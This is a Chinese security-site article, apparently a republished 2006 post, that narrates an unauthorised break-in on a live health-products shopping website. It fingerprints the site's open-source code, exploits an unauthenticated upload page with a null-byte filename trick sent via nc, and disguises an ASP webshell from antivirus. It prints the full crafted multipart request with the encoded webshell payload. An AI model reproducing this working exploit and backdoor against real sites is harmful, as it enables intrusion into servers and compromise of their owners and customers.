为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 编程开发 查看内容

利用seeknot的破解实例

2006-2-17 04:51| 投稿: soft

摘要: 今天朋友给我一个卖保健品的网站,据说提交订单失效,疑似诈骗行为,遂查之。   1、输入网址:http://www.bjp**.com,基本的安全做的不错,不存在简单的注入点,极有可...
今天朋友给我一个卖保健品的网站,据说提交订单失效,疑似诈骗行为,遂查之。   1、输入网址:http://www.bjp**.com,基本的安全做的不错,不存在简单的注入点,极有可能是一套开源的代码。   2、登陆www.seeknot.com,利用其源码目录的查询功能反向查找源码名称,该网站有一新闻页面是:dongtai.asp,在www.seeknot.com输入dongtai.asp,列出6项源码,具体列表见:http://www.seeknot.com/result.asp?key=dongtai.asp&selected=1。   3、进一步查询:该源码还有一页名称是fk.asp,在www.seeknot.com中输入fk.asp,其结果更上次结果取交集,确认源码为:秋叶购物商城V5.0(前台+后台演示+BBS) ,版本可能有出入。该源码的详细目录列表见:http://www.seeknot.com/showlist.asp?id=599   4、下载秋叶购物系统源码,察看几个容易出现安全漏洞的关键点,发现存在类似动网6.0的上传漏洞,并且上传页面没有身份检测,即不用登陆,即可操作,上传页面为:http://www.bjp**.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg。   5、打开WSockExpert.exe,监听该上传页面,然后上传一asp木马,肯定失败,不过我们得到了构造数据包的信息,将WSockExpert.exe的信息拷贝到文本文件up.txt。   6、打开up.txt,把filename="D:\up.asp"改成:filename="D:\up.jpg",把 Content-Disposition: form-data; name="filepath" bookpic/ 修改成:Content-Disposition: form-data; name="filepath" bookpic/test.asp (注意有空格)。    7、用C32Asm打开up.txt,将上面提到的空格对应之“20”改成“00”。   8、用nc提交数据包:nc -vv www.bjp**.com 80 <up.txt   9、显示提交成功,在ie输入连接:http://www.bjp**.com/bookpic/test.asp,报告找不到页面。分析是该服务器杀毒软件比较新,把我那么看似清白的木马都杀了,找一个网页木马的免杀工具转换一下。  10、转换后,重复5—8步,成功。        附:最终up.txt内容     POST /scfileflash.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*Referer: http://www.bjp**.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpgAccept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7d529f21360210Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; Alexa Toolbar)Host: www.bjp**.comContent-Length: 2885Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDCCCRRTBS=IONNHCGBFNGKLOEJFCEABHMD; AjStatajiang%5Fstat1=UserPages=9&AjstatPages=9; Ajiangajiang%5Fstat1=Ajstat2=1 -----------------------------7d529f21360210Content-Disposition: form-data; name="filepath" bookpic/test.asp -----------------------------7d529f21360210Content-Disposition: form-data; name="filelx" jpg-----------------------------7d529f21360210Content-Disposition: form-data; name="EditName" bookpic-----------------------------7d529f21360210Content-Disposition: form-data; name="FormName" myform-----------------------------7d529f21360210Content-Disposition: form-data; name="act" uploadfile-----------------------------7d529f21360210Content-Disposition: form-data; name="file1"; filename="D:\免杀\Newmm.jpg"Content-Type: text/html <%@ LANGUAGE = VBScript.Encode %><html><body>this is a test</body></html><%#@~^DAAAAA==~9kh,W(L0kW,HQQAAA==^#~@%><%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%><%#@~^EgAAAA==~9kh,W(LmKE    O0bVnPngYAAA==^#~@%><%#@~^FgAAAA==~Kx~�DMWD,D�dEs+~x�6O~9wcAAA==^#~@%><%#@~^QAAAAA==~k+O,W(L0kW,xPk+.\�D ^M+lDnW(L+1OcJkmMk2YrUTRWk^n/H/OnsW4%n1YE#,rhcAAA==^#~@%><%#@~^KQAAAA==~b0~DDb:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+    PygwAAA==^#~@%><%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%><%#@~^QgAAAA==~k+O,W(LmKE    O0bVn'K4%WkWR1.+mY+DnaY6k^+cDn5!+dYvE/H0[2mYtEbBY.E�b,tRgAAA==^#~@%><%#@~^GgAAAA==~K4%1W!xY6k^nRSDrY�PW[mYl,vQkAAA==^#~@%><%#@~^EAAAAA==~b0~�DMP'ZPD4+    P1AQAAA==^#~@%><%#@~^OwAAAA==~M+daW    /+chMrY�PE@!6WUO,mW^GD{D+9@*dl7+,/;m^nk/Z@!JWW    Y@*E,nRMAAA==^#~@%><%#@~^BgAAAA==~�Vd�P6QEAAA==^#~@%><%#@~^PQAAAA==~M+daW    /+chMrY�PE@!6WUO,mW^GD{D+9@*dl7+,EU/;^1+d/e@!z6WUO@*JPgBQAAA==^#~@%><%#@~^CAAAAA==~�x[,k6PZgIAAA==^#~@%><%#@~^CwAAAA==~�D.cm^+lMPvgMAAA==^#~@%><%#@~^CAAAAA==~�x[,k6PZgIAAA==^#~@%><%#@~^FAAAAA==~K4%1W!xY6k^nR1VG/�PiAcAAA==^#~@%><%#@~^GgAAAA==~k+O,W(LmKE    O0bVn'    WO4bxo,5AkAAA==^#~@%><%#@~^FgAAAA==~k+O,W(L0kW,xP    WOtbxL~owcAAA==^#~@%><%#@~^MQAAAA==~M+daW    /+chMrY�PE@!6W.h,lmDrW    'BE~h+DtKNxwGdD@*EPZxAAAA==^#~@%><%#@~^TQAAAA==~M+daW    /+chMrY�PE保存文件的@!6WUO,mW^GD{D+9@*绝对路径c包括文件名)如9)'hn4wacldw*l@!J0GUD@*J~9xMAAA==^#~@%><%#@~^RQAAAA==~M+daW    /+chMrY�PE@!bx2;DPYH2+{Y+XO~xm:�'dXW[alOt,Ak9Y4x2 Pdr.+x*Z@*rPuhcAAA==^#~@%><%#@~^GQAAAA==~M+daW    /+chMrY�PE@!(D@*E,ugcAAA==^#~@%><%#@~^GgAAAA==~M+daW    /+chMrY�PE本文件绝对路径J,bAYAAA==^#~@%><%=#@~^NwAAAA==d�D-�Dc:lawmOtvDn;!+dOc/+M-+M\lMrC4^+k`E/^.bwO{    C:�Jbb,0hQAAA==^#~@%><%#@~^GQAAAA==~M+daW    /+chMrY�PE@!(D@*E,ugcAAA==^#~@%><%#@~^GgAAAA==~M+daW    /+chMrY�PE输入马的内容)rPpgYAAA==^#~@%><%#@~^UwAAAA==~M+daW    /+chMrY�PE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ahsAAA==^#~@%><%#@~^MQAAAA==~M+daW    /+chMrY�PE@!bx2;DPYH2+{/E(hrY,\mV;+x保存@*rPQxAAAA==^#~@%><%#@~^HAAAAA==~M+daW    /+chMrY�PE@!J0G.s@*J,yQgAAA==^#~@%>�-----------------------------7d529f21360210Content-Disposition: form-data; name="Submit" · 开始上传 ·-----------------------------7d529f21360210--

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部